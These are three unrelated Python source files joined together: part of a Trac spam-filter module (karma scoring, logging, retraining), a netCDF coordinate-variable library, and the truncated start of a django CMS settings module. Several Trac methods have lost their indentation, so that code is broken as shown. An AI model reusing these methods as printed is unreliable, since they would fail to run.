                    changes.append((None, trap))
        score = 0
        if self.trust_authenticated:
            # Authenticated users are trusted
            if req.authname and req.authname != 'anonymous':
                return
        # reasons: (name, points, message...) tuples kept for the log entry;
        # outreasons: translated messages shown to the user on rejection;
        # results: (strategy, points, duration) for statistics bookkeeping
        reasons = []
        outreasons = []
        results = []
        if req.authname and req.authname != 'anonymous':
            reasons.append(("AuthenticatedUserScore", str(self.authenticated_karma),
                            N_("User is authenticated")))
            score += self.authenticated_karma
        if self.attachment_karma != 0 and \
                req.args.get('attachment') is not None:
            reasons.append(("AttachmentScore", str(self.attachment_karma),
                            N_("Attachment weighting")))
            score += self.attachment_karma
        if self.register_karma != 0 and (req.path_info == "/register" or req.args.get(TrapFieldFilterStrategy(self.env).name_register)):
            reasons.append(("RegisterScore", str(self.register_karma),
                            N_("Registration weighting")))
            score += self.register_karma
        if not author:
            author = 'anonymous'
        self.log.debug("Spam testing for %s", req.path_info)
        content = self._combine_changes(changes)
        abbrev = shorten_line(content)
        self.log.debug('Testing content %r submitted by "%s"', abbrev, author)
        externals = []
        obvious = False
        # first pass: run the cheap internal strategies, queueing the
        # external (network) services for the second pass below
        for strategy in self.strategies:
            tim = time.time()
            try:
                if not strategy.is_external():
                    retval = strategy.test(req, author, content, ip)
                    tim = time.time()-tim
                    if tim > 3:
                        self.log.warn('Test %s took %d seconds to complete.',
                                      strategy, tim)
                    if retval:
                        points = retval[0]
                        if len(retval) > 2:
                            reason = retval[1] % retval[2:]
                        else:
                            reason = retval[1]
                        if points < 0:
                            # negative karma: remember a translated message
                            # for the user-facing rejection list
                            if len(retval) > 2:
                                outreasons.append(gettext(retval[1]) % retval[2:])
                            else:
                                outreasons.append(gettext(retval[1]))
                        self.log.debug('Filter strategy %r gave submission %d '
                                       'karma points (reason: %r)', strategy,
                                       points, reason)
                        score += points
                        if reason:
                            name = get_strategy_name(strategy)
                            # a very confident Bayes verdict marks the entry
                            # as "obvious" (may skip DB logging below)
                            if name == "Bayesian" and float(retval[2]) > 90:
                                obvious = True
                            reasons.append((name, str(points)) + retval[1:])
                        results.append((strategy, points, tim))
                    else:
                        self._record_action('test','empty', '', strategy, tim)
                elif self.use_external:
                    externals.append(strategy)
            except Exception, e:
                self._record_action('test', 'error', '', strategy, time.time()-tim)
                self.log.exception('Filter strategy %s raised exception: %s', strategy, e)
        extint = "testint"
        # second pass: external services -- skipped entirely when internal
        # tests were already decisive, and short-circuited per strategy once
        # the score crosses the stop thresholds
        if score > -self.skip_external and score < self.skip_externalham:
            # best performing services first
            externals = Statistics(self.env).sortbyperformance(externals)
            for strategy in externals:
                tim = time.time()
                try:
                    if score > -self.stop_external and score < self.stop_externalham:
                        extint = "testext"
                        retval = strategy.test(req, author, content, ip)
                        tim = time.time()-tim
                        if tim > 3:
                            self.log.warn('Test %s took %d seconds to '
                                          'complete.', strategy, tim)
                        if retval:
                            points = retval[0]
                            if len(retval) > 2:
                                reason = retval[1] % retval[2:]
                            else:
                                reason = retval[1]
                            if points < 0:
                                if len(retval) > 2:
                                    outreasons.append(gettext(retval[1]) % retval[2:])
                                else:
                                    outreasons.append(gettext(retval[1]))
                            self.log.debug('Filter strategy %r gave submission %d '
                                           'karma points (reason: %r)', strategy,
                                           points, reason)
                            score += points
                            if reason:
                                name = get_strategy_name(strategy)
                                reasons.append((name,str(points)) + retval[1:])
                            results.append((strategy, points, tim))
                        else:
                            self._record_action('test','empty', '', strategy, tim)
                except Exception, e:
                    self._record_action('test','error', '', strategy, time.time()-tim)
                    self.log.exception('Filter strategy %s raised exception: %s', strategy, e)
        reasons = sorted(reasons, key=lambda r: r[0])
        if score < self.min_karma:
            type = "spam"
            self._record_action(extint, 'spam', '', '', time.time()-start)
        else:
            type = "ham"
            self._record_action(extint, 'ham', '', '', time.time()-start)
        # a strategy counts as "ok" when the sign of its karma matched the
        # overall verdict
        for strategy,points,tim in results:
            if (points < 0 and score < self.min_karma) or (points > 0 and score >= self.min_karma):
                status = "ok"
            else:
                status = "error"
            self._record_action("test", type, status, strategy, tim)
        if self.logging_enabled:
            # reconstruct the HTTP header block from the WSGI environ
            headers = '\n'.join(['%s: %s' % (k[5:].replace('_', '-').title(), v)
                                 for k, v in req.environ.items()
                                 if k.startswith('HTTP_')])
            authenticated = req.authname and req.authname != 'anonymous'
            rejected = score < self.min_karma
            if not self.nolog_obvious or not obvious or authenticated or not rejected:
                LogEntry(self.env, time.time(), req.path_info, author,
                         authenticated, ip, headers, content, rejected,
                         score, reasons, [req.path_info, req.args]).insert()
            else:
                # obvious spam is counted in the statistics but not stored
                self.log.debug('Skip %s %s %d', author, req.remote_addr, score)
                type = "spam" if rejected else "ham"
                status = "delete"
                for strategy in self.strategies:
                    count = 0
                    name = get_strategy_name(strategy)
                    for r in reasons:
                        if r[0] == name:
                            count = as_int(r[1], 0)
                            break
                    if count:
                        spamstatus = count < 0
                        self._record_action(status, type, ("ok" if spamstatus == rejected else "error"), strategy, 0)
                    else:
                        self._record_action(status, type, '', strategy, 0)
                self._record_action(status, type, '', '', 0)
            LogEntry.purge(self.env, self.purge_age)
        if score < self.min_karma:
            self.log.debug('Rejecting submission %r by "%s" (%r) because it '
                           'earned only %d karma points (%d are required).',
                           abbrev, author, req.remote_addr, score, self.min_karma)
            rejects = []
            outreasons.sort()
            for r in outreasons:
                rejects.append(tag.li(r))
            msg = tag.div(tag.ul(rejects), class_='message')
            # raises via the configured reject handler; does not return
            self.reject_handler.reject_content(req, msg)
    def train(self, req, ids, spam=True, delete=False):
        """Re-train the filter strategies from logged submissions.
        Each log entry is replayed through a faked request rebuilt from the
        stored headers, and every trainable strategy is told whether the
        content was spam or ham.
        @param ids: a single log entry id or a list of ids
        @param spam: True to train the entries as spam, False as ham
        @param delete: when True the entries are deleted afterwards
        """
        # keep only the non-HTTP parts of the live environ; the HTTP
        # headers are restored from each log entry below
        environ = {}
        for name, value in req.environ.items():
            if not name.startswith('HTTP_'):
                environ[name] = value
        if not isinstance(ids, list):
            ids = [ids]
        for log_id in ids:
            start = time.time()
            entry = LogEntry.fetch(self.env, log_id)
            if entry:
                extint = "trainint"
                self.log.debug('Marking as %s: %r submitted by "%s"',
                               spam and 'spam' or 'ham',
                               shorten_line(entry.content),
                               entry.author)
                # rebuild a fake WSGI environ from the logged headers
                fakeenv = environ.copy()
                for header in entry.headers.splitlines():
                    name, value = header.split(':', 1)
                    if name == 'Cookie': # breaks SimpleCookie somehow
                        continue
                    cgi_name = 'HTTP_%s' % name.strip().replace('-', '_').upper()
                    fakeenv[cgi_name] = value.strip()
                fakeenv['REQUEST_METHOD'] = 'POST'
                fakeenv['PATH_INFO'] = entry.path
                fakeenv['wsgi.input'] = StringIO('')
                fakeenv['REMOTE_ADDR'] = entry.ipnr
                if entry.authenticated:
                    fakeenv['REMOTE_USER'] = entry.author
                type = "spam" if spam else "ham"
                for strategy in self.strategies:
                    status = "trainskip"
                    # external services are only trained when both
                    # use_external and train_external are enabled
                    if (self.use_external and self.train_external) or not strategy.is_external():
                        tim = time.time()
                        extint = "trainext"
                        res = strategy.train(Request(fakeenv, None),
                                             entry.author or 'anonymous',
                                             entry.content, entry.ipnr, spam=spam)
                        tim = time.time()-tim
                        if tim > 3:
                            self.log.warn('Training %s took %d seconds to '
                                          'complete.', strategy, tim)
                        # map the strategy's return code onto a status label
                        if res == -1:
                            status = "trainerror"
                        elif res == -2:
                            status = "traincond"
                        elif res > 0:
                            status = "train"
                        count = entry.findreasonvalue(get_strategy_name(strategy))
                        if count:
                            spamstatus = count < 0
                            self._record_action(status, type, ("ok" if spamstatus == spam else "error"), strategy, tim)
                        else:
                            self._record_action(status, type, '', strategy, tim)
                self._record_action(extint, type, ("ok" if entry.rejected == spam else "error"), '', time.time()-start)
                entry.update(rejected=spam)
                if delete:
                    self.delete(req, log_id, True)
    def delete(self, req, ids, stats):
        """Delete log entries, optionally recording delete statistics.

        :param req: current request (unused here beyond the interface)
        :param ids: a single log-entry id or a list of ids
        :param stats: when True, record a "delete" statistic per strategy
                      before the entries are removed
        """
        if not isinstance(ids, list):
            ids = [ids]
        if stats:
            for log_id in ids:
                entry = LogEntry.fetch(self.env, log_id)
                if entry:
                    type = "spam" if entry.rejected else "ham"
                    status = "delete"
                    for strategy in self.strategies:
                        # Sign of the strategy's karma contribution encodes
                        # its verdict; compare with the entry's final state.
                        count = entry.findreasonvalue(get_strategy_name(strategy))
                        if count:
                            spamstatus = count < 0
                            self._record_action(status, type, ("ok" if spamstatus == entry.rejected else "error"), strategy, 0)
                        else:
                            self._record_action(status, type, '', strategy, 0)
                    # Global (strategy-less) delete record for this entry.
                    self._record_action(status, type, '', '', 0)
        LogEntry.delete(self.env, ids)
def deleteobvious(self, req):
ids = LogEntry.getobvious(self.env)
if ids:
self.delete(req, ids, True)
    # IEnvironmentSetupParticipant methods

    def environment_created(self):
        """Create the spam-filter schema in a freshly created environment."""
        self.upgrade_environment()

    def environment_needs_upgrade(self):
        # True when the stored schema version lags the current one.
        dbm = DatabaseManager(self.env)
        return dbm.needs_upgrade(schema_version, schema_version_name)

    def upgrade_environment(self):
        """Create the schema on first install, otherwise run upgrade scripts."""
        dbm = DatabaseManager(self.env)
        current_version = dbm.get_database_version(schema_version_name)
        if not current_version:
            # Fresh install: create all tables and stamp the schema version.
            dbm.create_tables(schema)
            dbm.set_database_version(schema_version, schema_version_name)
        else:
            # Incremental upgrade via the numbered scripts in that package.
            dbm.upgrade(schema_version, schema_version_name,
                        'tracspamfilter.upgrades')
# IPermissionRequestor methods
def get_permission_actions(self):
perms = ['SPAM_CONFIG', 'SPAM_MONITOR', 'SPAM_TRAIN', 'SPAM_USER',
'SPAM_REPORT', 'SPAM_CHECKREPORTS']
return perms + [('SPAM_ADMIN', perms)]
    # ISystemInfoProvider methods

    def get_system_info(self):
        """Yield (package, version) pairs for optional external libraries."""
        # Move implementation to httpbl, ip_blacklist and url_blacklist
        # when support for Trac < 1.2 is dropped (#12294).
        try:
            import dns
        except ImportError:
            # dnspython is optional; report nothing when it is not installed.
            pass
        else:
            yield 'dnspython', get_pkginfo(dns)['version']
# Internal methods
def _combine_changes(self, changes, sep='\n\n'):
fields = []
for old_content, new_content in changes:
new_content = to_unicode(new_content)
if old_content:
old_content = to_unicode(old_content)
new_content = self._get_added_lines(old_content, new_content)
fields.append(new_content)
return sep.join(fields)
def _get_added_lines(self, old_content, new_content):
buf = []
old_lines = old_content.splitlines()
new_lines = new_content.splitlines()
matcher = SequenceMatcher(None, old_lines, new_lines)
for group in matcher.get_grouped_opcodes(0):
for tag, i1, i2, j1, j2 in group:
if tag in ('insert', 'replace'):
buf.append('\n'.join(new_lines[j1:j2]))
return '\n'.join(buf)
def _record_action(self, action, data, status, strategy, delay):
stats = Statistics(self.env)
if strategy:
name = get_strategy_name(strategy)
stats.insert_or_update(name, action, data, status, delay, 1 if strategy.is_external() else 0)
else:
stats.insert_or_update('', action, data, status, delay, None)
|
|
from bisect import bisect_left, bisect_right
import numpy
from datetime import date, datetime
import pytz
from affine import Affine
from netCDF4 import num2date, date2num, Variable
from pyproj import Proj
import six
from trefoil.geometry.bbox import BBox
from trefoil.utilities.proj import is_latlong
from trefoil.utilities.window import Window
from trefoil.netcdf.utilities import get_ncattrs
from trefoil.netcdf.crs import PROJ4_GEOGRAPHIC
class CoordinateVariable(object):
    """
    Wraps a one-dimensional variable with the same name as a dimension
    (http://www.unidata.ucar.edu/software/netcdf/docs/BestPractices.html).
    """

    def __init__(self, input):
        """
        A Coordinate Variable can be created from a netCDF dataset variable or a numpy array.

        :param input: variable in a netCDF dataset or a numpy array
        """
        # netCDF attributes carried over from the source variable
        # (everything except _FillValue, which is a creation-time option).
        self._ncattrs = dict()
        if isinstance(input, Variable):
            self.values = input[:]
            for attr in input.ncattrs():
                if not attr == '_FillValue':
                    self._ncattrs[attr] = input.getncattr(attr)
        else:
            # Copy so later mutation of self.values cannot alter the caller's array.
            self.values = input[:].copy()

    def __len__(self):
        return self.values.shape[0]

    def is_ascending_order(self):
        # NOTE(review): compares only the first two entries; assumes a
        # monotonic axis with at least two values — confirm for 1-element axes.
        return self.values[0] < self.values[1]

    def indices_for_range(self, start, stop):
        """
        Returns the indices in this variable for the start and stop values

        :param start: start value
        :param stop: stop value
        :return: start and stop indices
        """
        assert stop > start

        # Requested range lies entirely outside the data: clamp to an edge.
        if start > self.values.max():
            return self.values.size - 1, self.values.size - 1
        elif stop < self.values.min():
            return 0, 0

        if self.is_ascending_order():
            start_index = min(self.values.searchsorted(start), self.values.size - 1)
            # Need to move 1 index to the left unless we matched an index closely (allowing for precision errors)
            if start_index > 0 and not numpy.isclose(start, self.values[start_index]):
                start_index -= 1
            stop_index = min(self.values.searchsorted(stop), self.values.size - 1)
            if not numpy.isclose(stop, self.values[stop_index]) and stop < self.values[stop_index]:
                stop_index -= 1
            return start_index, stop_index
        else:
            # If values are not ascending, they need to be reversed
            temp = self.values[::-1]
            start_index = min(temp.searchsorted(start), temp.size - 1)
            if start_index > 0 and not numpy.isclose(start, temp[start_index]):
                start_index -= 1
            stop_index = min(temp.searchsorted(stop), temp.size - 1)
            if not numpy.isclose(stop, temp[stop_index]) and stop < temp[stop_index]:
                stop_index -= 1
            # Map indices found in the reversed copy back to original order.
            size = self.values.size - 1
            return max(size - stop_index, 0), max(size - start_index, 0)

    def slice_by_range(self, start, stop):
        """
        Slices a subset of values between start and stop values.

        :param start: start value
        :param stop: stop value
        :return: sliced view of self.values. Make sure to copy this before altering it!
        """
        assert stop > start

        # Range entirely outside the data: nothing to slice.
        if start >= self.values.max() or stop <= self.values.min():
            return numpy.array([])

        start_index, stop_index = self.indices_for_range(start, stop)
        # stop_index is inclusive, hence the +1.
        return self.values[start_index:stop_index+1]

    def add_to_dataset(self, dataset, name, is_unlimited=False, **kwargs):
        """
        :param dataset: name of the dataset to add the dimension and variable to
        :param name: name of the dimension and variable
        :param is_unlimited: set the dimension as unlimited
        :param kwargs: creation options for output variable. Should be limited to compression info.
        :return: the newly created variable
        """
        if name in dataset.variables:
            raise Exception("Variable already exists in dataset")

        if name in dataset.dimensions:
            # Reuse an existing dimension only if it matches exactly.
            dimension = dataset.dimensions[name]
            if is_unlimited != dimension.isunlimited() or len(self) != len(dimension):
                raise Exception("Dimension already exists in dataset, but has different size")
        else:
            dimension_length = None if is_unlimited else len(self)
            dataset.createDimension(name, dimension_length)

        # Derive fill_value from a masked array unless the caller passed one.
        if 'fill_value' not in kwargs:
            fill_value = getattr(self.values, 'fill_value', None)
            if fill_value is not None:
                kwargs['fill_value'] = fill_value

        if self.values.dtype.char == 'S':
            variable = dataset.createVariable(name, 'string', (name,), **kwargs)
            # Have to write each index at a time, and cast to string. Not optimal but seems to be the only way allowed by netCDF4.
            for index, value in enumerate(self.values):
                variable[index] = str(value)
        else:
            variable = dataset.createVariable(name, self.values.dtype, (name,), **kwargs)
            variable[:] = self.values[:]

        # Copy over the retained netCDF attributes.
        for att, value in six.iteritems(self._ncattrs):
            variable.setncattr(att, value)
        return variable
class BoundsCoordinateVariable(CoordinateVariable):
    """
    Wraps a two-dimensional variable representing bounds. Shape is always (N, 2).
    Useful for representing time ranges, etc.

    Example: http://www.cgd.ucar.edu/cms/eaton/netcdf/CF-20010629.htm#grid_ex4
    """

    def is_ascending_order(self):
        # Compare the start values of the first two bounds pairs.
        return self.values[0][0] < self.values[1][0]

    def indices_for_range(self, start, stop):
        raise NotImplementedError("Not yet implemented")

    def add_to_dataset(self, dataset, name, is_unlimited=False, **kwargs):
        """
        :param dataset: name of the dataset to add the dimension and variable to
        :param name: name of the dimension and variable. Note: a new dimension for the bounds '_bnds' will be created.
        :param is_unlimited: set the dimension as unlimited
        :param kwargs: creation options for output variable. Should be limited to compression info.
        :return: the newly created variable
        """
        if name in dataset.variables:
            raise Exception("Variable already exists in dataset")

        # Secondary dimension of size 2 holding (lower, upper) bounds.
        bounds_dimension_name = '_bnds'
        if bounds_dimension_name in dataset.dimensions:
            if len(dataset.dimensions[bounds_dimension_name]) != 2:
                raise ValueError('Bounds dimension _bnds is already present in dataset and not of size 2')
        else:
            dataset.createDimension(bounds_dimension_name, 2)

        if name in dataset.dimensions:
            dimension = dataset.dimensions[name]
            if is_unlimited != dimension.isunlimited() or len(self) != len(dimension):
                raise Exception("Dimension already exists in dataset, but has different size")
        else:
            dimension_length = None if is_unlimited else len(self)
            dataset.createDimension(name, dimension_length)

        # Fix: consistent with CoordinateVariable.add_to_dataset — only derive
        # fill_value from a masked array when the caller did not already pass
        # one explicitly (previously a caller-supplied kwarg was overwritten).
        if 'fill_value' not in kwargs:
            fill_value = getattr(self.values, 'fill_value', None)
            if fill_value is not None:
                kwargs['fill_value'] = fill_value

        variable = dataset.createVariable(name, self.values.dtype, (name, bounds_dimension_name), **kwargs)
        variable[:] = self.values[:]

        # Copy over the retained netCDF attributes.
        for att, value in six.iteritems(self._ncattrs):
            variable.setncattr(att, value)
        return variable
class SpatialCoordinateVariable(CoordinateVariable):
    """
    Abstracts properties for a given spatial dimension (e.g., longitude).
    Assumes that pixels follow a regular grid, and that dimension values represent centroids
    """

    @property
    def min(self):
        """Smallest centroid coordinate."""
        return self.values.min()

    @property
    def max(self):
        """Largest centroid coordinate."""
        return self.values.max()

    @property
    def pixel_size(self):
        """Absolute spacing between the first two centroids (regular grid)."""
        return float(abs(self.values[1] - self.values[0]))

    @property
    def edges(self):
        """
        Return coordinates of pixel edges from the min to the max
        """
        step = self.pixel_size
        # Extend by one centroid on the trailing end, then shift by half a
        # pixel so every entry lands on a pixel edge.
        if self.is_ascending_order():
            extended = numpy.append(self.values, self.values[-1] + step)
        else:
            extended = numpy.append(self.values[0] + step, self.values)
        return extended - (step / 2.0)

    def get_offset_for_subset(self, coordinate_variable):
        """
        Find the offset index of coordinate_variable within this coordinate variable.
        This assumes that coordinate_variable is a subset of this one, and that coordinates and projections match.
        """
        assert len(coordinate_variable) <= self.values.shape[0]

        #TODO: make this a fuzzy match within a certain decimal precision
        return list(self.values).index(coordinate_variable.values[0])
class SpatialCoordinateVariables(object):
    """
    Encapsulates x and y coordinates with projection information
    """

    def __init__(self, x, y, projection):
        """
        :param x: SpatialCoordinateVariable for the x dimension
        :param y: SpatialCoordinateVariable for the y dimension
        :param projection: pyproj Proj instance, or None when unknown
        """
        assert isinstance(x, SpatialCoordinateVariable)
        assert isinstance(y, SpatialCoordinateVariable)
        if projection is not None:
            assert isinstance(projection, Proj)

        self.x = x
        self.y = y
        self.projection = projection

    @property
    def shape(self):
        # (rows, cols): y first, matching raster conventions.
        return (len(self.y), len(self.x))

    @property
    def bbox(self):
        # Bounding box of pixel *edges*: centroid extremes expanded by half a pixel.
        half_x_pixel_size = self.x.pixel_size / 2.0
        half_y_pixel_size = self.y.pixel_size / 2.0

        return BBox(
            (
                self.x.min - half_x_pixel_size,
                self.y.min - half_y_pixel_size,
                self.x.max + half_x_pixel_size,
                self.y.max + half_y_pixel_size
            ),
            self.projection
        )

    @property
    def affine(self):
        """Affine transform for this grid (rotation terms are not used)."""
        bbox = self.bbox
        return Affine(
            self.x.pixel_size,
            0,  # Not used
            bbox.xmin,
            0,  # Not used
            self.y.values[1] - self.y.values[0],  # Negative if y is descending
            bbox.ymin if self.y.is_ascending_order() else bbox.ymax
        )

    @classmethod
    def from_dataset(cls, dataset, x_name='longitude', y_name='latitude', projection=None):
        """
        Return a SpatialCoordinateVariables object for a dataset

        :param dataset: netCDF dataset
        :param x_name: name of the x dimension
        :param y_name: name of the y dimension
        :param projection: pyproj Proj object
        :return: CoordinateVariables instance
        """
        #TODO: detect x and y names, and projection
        # Default to geographic coordinates when x is named 'longitude'.
        if projection is None and x_name == 'longitude':
            projection = Proj(PROJ4_GEOGRAPHIC)

        return cls(
            SpatialCoordinateVariable(dataset.variables[x_name]),
            SpatialCoordinateVariable(dataset.variables[y_name]),
            projection
        )

    @staticmethod
    def from_bbox(bbox, x_size, y_size, dtype='float32', y_ascending=False):
        """
        Return a SpatialCoordinateVariables object from BBox and dimensions

        :param bbox: instance of a BBox, must have a projection
        :param x_size: number of pixels in x dimension (width or number of columns)
        :param y_size: number of pixels in y dimension (height or number of rows)
        :param dtype: data type (string or numpy dtype object) of values
        :param y_ascending: by default, y values are anchored from top left and are descending; if True, this inverts that order
        :return: CoordinateVariables instance, assuming that rows are ordered in decreasing value
        """
        assert isinstance(bbox, BBox)
        if not bbox.projection:
            raise ValueError('bbox projection must be defined')

        x_pixel_size = (bbox.xmax - bbox.xmin) / float(x_size)
        y_pixel_size = (bbox.ymax - bbox.ymin) / float(y_size)

        # Centroids: edge plus half a pixel, stepping one pixel at a time.
        x_arr = numpy.arange(x_size, dtype=dtype)
        x_arr *= x_pixel_size
        x_arr += (bbox.xmin + x_pixel_size / 2.0)
        if y_ascending:
            y_arr = numpy.arange(y_size, dtype=dtype)
            y_arr *= y_pixel_size
            y_arr += (bbox.ymin + y_pixel_size / 2.0)
        else:
            # Descending: count down from the top edge.
            y_arr = numpy.arange(0, -y_size, -1, dtype=dtype)
            y_arr *= y_pixel_size
            y_arr += (bbox.ymax - y_pixel_size / 2.0)
        x = SpatialCoordinateVariable(x_arr)
        y = SpatialCoordinateVariable(y_arr)

        return SpatialCoordinateVariables(x, y, bbox.projection)

    def add_to_dataset(self, dataset, x_name, y_name, **kwargs):
        """Write both coordinate variables to *dataset* with CF-style attributes."""
        x_var = self.x.add_to_dataset(dataset, x_name, **kwargs)
        y_var = self.y.add_to_dataset(dataset, y_name, **kwargs)

        x_var.setncattr('axis', 'X')
        y_var.setncattr('axis', 'Y')

        if self.projection:
            if is_latlong(self.projection):
                # Geographic coordinates: standard CF lat/long metadata.
                x_var.setncattr('standard_name', 'longitude')
                x_var.setncattr('long_name', 'longitude')
                x_var.setncattr('units', 'degrees_east')
                y_var.setncattr('standard_name', 'latitude')
                y_var.setncattr('long_name', 'latitude')
                y_var.setncattr('units', 'degrees_north')
            else:
                # Projected coordinates.
                x_var.setncattr('standard_name', 'projection_x_coordinate')
                x_var.setncattr('long_name', 'x coordinate of projection')
                y_var.setncattr('standard_name', 'projection_y_coordinate')
                y_var.setncattr('long_name', 'y coordinate of projection')

    def slice_by_bbox(self, bbox):
        """Return new coordinates clipped to *bbox* (same projection assumed)."""
        assert isinstance(bbox, BBox)

        x_half_pixel_size = float(self.x.pixel_size)/2
        y_half_pixel_size = float(self.y.pixel_size)/2

        # Note: this is very sensitive to decimal precision.
        # Shrink by half a pixel so the range is expressed in centroids.
        x = SpatialCoordinateVariable(
            self.x.slice_by_range(bbox.xmin + x_half_pixel_size, bbox.xmax - x_half_pixel_size)
        )
        y = SpatialCoordinateVariable(
            self.y.slice_by_range(bbox.ymin + y_half_pixel_size, bbox.ymax - y_half_pixel_size)
        )
        return SpatialCoordinateVariables(x, y, self.projection)

    def slice_by_window(self, window):
        """Return new coordinates restricted to the rows/cols of *window*."""
        assert isinstance(window, Window)

        x = SpatialCoordinateVariable(self.x.values[window.x_slice])
        y = SpatialCoordinateVariable(self.y.values[window.y_slice])
        return SpatialCoordinateVariables(x, y, self.projection)

    def get_window_for_subset(self, subset_coordinates):
        """
        return a Window representing offsets of subset_coordinates self within subset_coordinates.
        Assumed to be in same projection, etc.

        :param subset_coordinates: the coordinates of the subset within self
        """
        assert isinstance(subset_coordinates, SpatialCoordinateVariables)

        y_offset = self.y.get_offset_for_subset(subset_coordinates.y)
        x_offset = self.x.get_offset_for_subset(subset_coordinates.x)
        return Window((y_offset, len(subset_coordinates.y) + y_offset),
                      (x_offset, len(subset_coordinates.x) + x_offset))

    def get_window_for_bbox(self, bbox):
        """
        return a Window representing offsets of bbox within self

        :param bbox: instance of bounding box representing coordinates to use for Window
        :return: Window instance to extract data from within coordinate range of self
        """
        assert isinstance(bbox, BBox)

        y_half_pixel_size = float(self.y.pixel_size)/2
        x_half_pixel_size = float(self.x.pixel_size)/2

        # Convert edge coordinates to centroid coordinates, then look up indices.
        y_offset, y_max = self.y.indices_for_range(bbox.ymin + y_half_pixel_size, bbox.ymax - y_half_pixel_size)
        x_offset, x_max = self.x.indices_for_range(bbox.xmin + x_half_pixel_size, bbox.xmax - x_half_pixel_size)
        # indices_for_range returns inclusive indices; Window bounds are exclusive.
        return Window((y_offset, y_max + 1), (x_offset, x_max + 1))
class DateVariable(CoordinateVariable):
    """
    Provides utility wrapper of a date variable, especially when stored according to CF convention.
    If variable conforms to CF convention pattern (has units with 'since' in label and calendar) then
    dates are extracted and converted to python date objects.
    Dates are assumed to be sorted in ascending order.
    """

    def __init__(self, input, units_start_date=date(2000, 1, 1), calendar='360_day'):
        """
        Create from a variable with CF Convention units and calendar, or
        an array of years.

        If created from years, values are recorded on the first day of the month
        for each year, and are exported using units of days (years not allowed
        by CF convention. Lame).
        """
        assert calendar in ('360_day', 'gregorian', 'standard', 'julian', '360', 'noleap')

        super(DateVariable, self).__init__(input)

        if isinstance(input, Variable):
            attributes = get_ncattrs(input)
            self.units = attributes.get('units', '').lower()
            self.calendar = attributes.get('calendar', '').lower()
            if self.units and self.calendar and 'since' in self.units.lower():
                # CF-style "<unit>s since <date>": let netCDF4 convert.
                self.dates = num2date(self.values, self.units, self.calendar)
            elif (self.units and 'year' in self.units) or 'year' in input._name.lower():
                # Plain integer years.
                self.dates = numpy.array([datetime(y, 1, 1, tzinfo=pytz.UTC) for y in self.values.astype('int')])
            else:
                raise ValueError('Variable is missing required attributes: units, calendar')
        else:
            # NOTE(review): self.unit is a derived property that reads
            # self.datetimes (and thus self.dates), which is only assigned
            # further below — confirm the inputs used with this branch.
            self.units = 'year' if self.unit == 'year' else '{0}s since {1}'.format(self.unit, str(units_start_date))
            self.calendar = calendar
            if self.values.dtype.kind in ('i', 'u', 'f'):
                # Numeric input is interpreted as years.
                self.dates = numpy.array([datetime(y, 1, 1) for y in self.values])
            elif isinstance(self.values[0], datetime):
                self.dates = self.values.copy()
            if self.unit == 'year':
                self.values = numpy.array([x.year for x in self.values], dtype='int32')
            else:
                self.values = numpy.array(
                    date2num(self.dates, units=self.units, calendar=self.calendar), dtype=numpy.int32
                )

    @property
    def datetimes(self):
        """
        Convert to python datetimes if not done automatically (calendar not compatible with python datetimes).
        Use with caution
        """
        if isinstance(self.dates[0], datetime):
            return self.dates
        else:
            # cftime-style objects: rebuild as UTC datetimes from timetuple.
            return numpy.array([datetime(*d.timetuple()[:6], tzinfo=pytz.UTC) for d in self.dates])

    @property
    def unit(self):
        """Infer the step unit ('year', 'month', 'day', 'hour', 'minute',
        'second') from consecutive date differences."""
        def varies_by_year(x, y):
            # Same month/day and zero sub-day remainder, but different year.
            if y.year == x.year or (y - x).seconds != 0 or x.month != y.month or x.day != y.day:
                return False
            return True

        def varies_by_month(x, y):
            # Same day and zero sub-day remainder, but different month.
            if x.month == y.month or (y - x).seconds != 0 or x.day != y.day:
                return False
            return True

        datetimes = self.datetimes if not self.values.dtype == datetime else self.values

        if all(varies_by_year(datetimes[i], datetimes[i-1]) for i in range(1, len(datetimes))):
            return 'year'
        elif all(varies_by_month(datetimes[i], datetimes[i-1]) for i in range(1, len(datetimes))):
            return 'month'

        # Sub-month steps: pick the largest unit that divides every delta.
        # NOTE(review): uses timedelta.seconds (sub-day remainder), not
        # total_seconds() — confirm multi-day steps are classified as intended.
        deltas = datetimes[1:] - datetimes[:-1]
        for unit, seconds in (('day', 86400), ('hour', 3600), ('minute', 60), ('second', 1)):
            if any(x.seconds % seconds != 0 for x in deltas):
                continue
            break
        return unit

    def add_to_dataset(self, dataset, name, **kwargs):
        # NOTE(review): unlike the parent, this override does not return the
        # created variable — confirm callers do not rely on a return value.
        variable = super(DateVariable, self).add_to_dataset(dataset, name, **kwargs)
        for att in ('units', 'calendar'):
            variable.setncattr(att, getattr(self, att))

    def indices_for_range(self, start, stop):
        """
        Returns the indices in this variable for the start and stop values. Data must be in ascending order

        :param start: start value. Can be a date object or a year.
        :param stop: stop value. Can be a date object or a year.
        :return: start and stop indices
        """
        if not self.is_ascending_order():
            raise ValueError("Dates must be in ascending order")

        # Bare years are widened to cover the whole year.
        if not isinstance(start, date):
            start = date(start, 1, 1)
        if not isinstance(stop, date):
            stop = date(stop, 12, 31)

        return numpy.searchsorted(self.dates, start), numpy.searchsorted(self.dates, stop)
|
|
# -*- coding: utf-8 -*-
from functools import update_wrapper
import os
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.utils.translation import ugettext_lazy as _
from django.utils.six.moves.urllib.parse import urljoin
from cms import constants
__all__ = ['get_cms_setting']
# Sentinel dict key: its presence marks a CMS_LANGUAGES dict as already validated.
class VERIFIED: pass # need a unique identifier for CMS_LANGUAGES
def default(name):
    """Decorator factory: prefer the Django setting *name* over the wrapped
    zero-argument callable's computed default.

    The wrapped function supplies the fallback value; when ``settings.<name>``
    is defined it takes precedence.
    """
    def decorator(wrapped):
        def wrapper():
            if hasattr(settings, name):
                return getattr(settings, name)
            return wrapped()
        update_wrapper(wrapper, wrapped)
        # Bug fix: previously returned ``wrapped``, which made ``wrapper``
        # dead code and ignored an explicitly configured setting entirely.
        return wrapper
    return decorator
# Fallback values for plain CMS_<NAME> settings, resolved by get_cms_setting().
DEFAULTS = {
    'TEMPLATE_INHERITANCE': True,
    'DEFAULT_X_FRAME_OPTIONS': constants.X_FRAME_OPTIONS_INHERIT,
    'TOOLBAR_SIMPLE_STRUCTURE_MODE': True,
    'PLACEHOLDER_CONF': {},
    'PERMISSION': False,
    # Whether to use raw ID lookups for users when PERMISSION is True
    'RAW_ID_USERS': False,
    'PUBLIC_FOR': 'all',
    'APPHOOKS': [],
    'TOOLBARS': [],
    'SITE_CHOICES_CACHE_KEY': 'CMS:site_choices',
    'PAGE_CHOICES_CACHE_KEY': 'CMS:page_choices',
